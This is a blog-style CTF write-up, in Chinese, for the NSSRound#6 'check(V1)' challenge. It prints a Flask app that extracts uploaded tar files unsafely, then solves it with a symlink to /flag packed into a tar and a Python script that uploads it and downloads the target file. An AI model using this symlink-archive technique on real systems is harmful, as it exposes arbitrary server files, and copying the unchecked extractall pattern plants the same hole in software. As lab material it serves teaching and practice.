[NSSRound#6 Team]check(V1)

[NSSRound#6 Team]check(V1)

源码:

# -*- coding: utf-8 -*-
from flask import Flask,request
import tarfile
import os

app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024
ALLOWED_EXTENSIONS = set(['tar'])

def allowed_file(filename):
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

@app.route('/')
def index():
    with open(__file__, 'r') as f:
        return f.read()

@app.route('/upload', methods=['POST'])
def upload_file():
    if 'file' not in request.files:
        return '?'
    file = request.files['file']
    if file.filename == '':
        return '?'
    print(file.filename)
    if file and allowed_file(file.filename) and '..' not in file.filename and '/' not in file.filename:
        file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
        if(os.path.exists(file_save_path)):
            return 'This file already exists'
        file.save(file_save_path)
    else:
        return 'This file is not a tarfile'
    try:
        tar = tarfile.open(file_save_path, "r")
        tar.extractall(app.config['UPLOAD_FOLDER'])
    except Exception as e:
        return str(e)
    os.remove(file_save_path)
    return 'success'

@app.route('/download', methods=['POST'])
def download_file():
    filename = request.form.get('filename')
    if filename is None or filename == '':
        return '?'
    
    filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
    
    if '..' in filename or '/' in filename:
        return '?'
    
    if not os.path.exists(filepath) or not os.path.isfile(filepath):
        return '?'
    
    with open(filepath, 'r') as f:
        return f.read()
    
@app.route('/clean', methods=['POST'])
def clean_file():
    os.system('/tmp/clean.sh')
    return 'success'

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True, port=80)


tar = tarfile.open(file_save_path, "r")
tar.extractall(app.config['UPLOAD_FOLDER'])

#这段代码存在文件路径注入漏洞
#文件路径注入:如果file_save_path变量的值是通过用户输入或其他不可信的来源获取的,存在路径注入的风险。攻击者可以通过构造恶意的路径来访问系统中的其他文件或目录。

思路:

本题只允许tar文件上传,我们可以上传一个tar文件,这个文件中包含了一个指向flag的软连接,最后通过download路由,将文件下载下来得到flag。

解题:

ln -s /flag flag
tar -cvf flag.tar flag

image-20230725150505015

通过以下脚本来进行上传,并且download flag并打印。

import requests as req

url = "http://node2.anna.nssctf.cn:28339/"
filename = r"D:/flag.tar"
def upload(url ,fileName):
    url = url + "upload"
    file = {"file":open(fileName,'rb')}
    response = req.post(url=url, files = file)
    print(response.text)

def download(url):
    url = url+"download"
    file = {"filename":"flag"}
    response = req.post(url, data=file)
    print(response.text)
if __name__ == "__main__":
    upload(url,filename)
    download(url)
posted @ 2023-07-25 15:10  Magic水瓶  阅读(107)  评论(0)    收藏  举报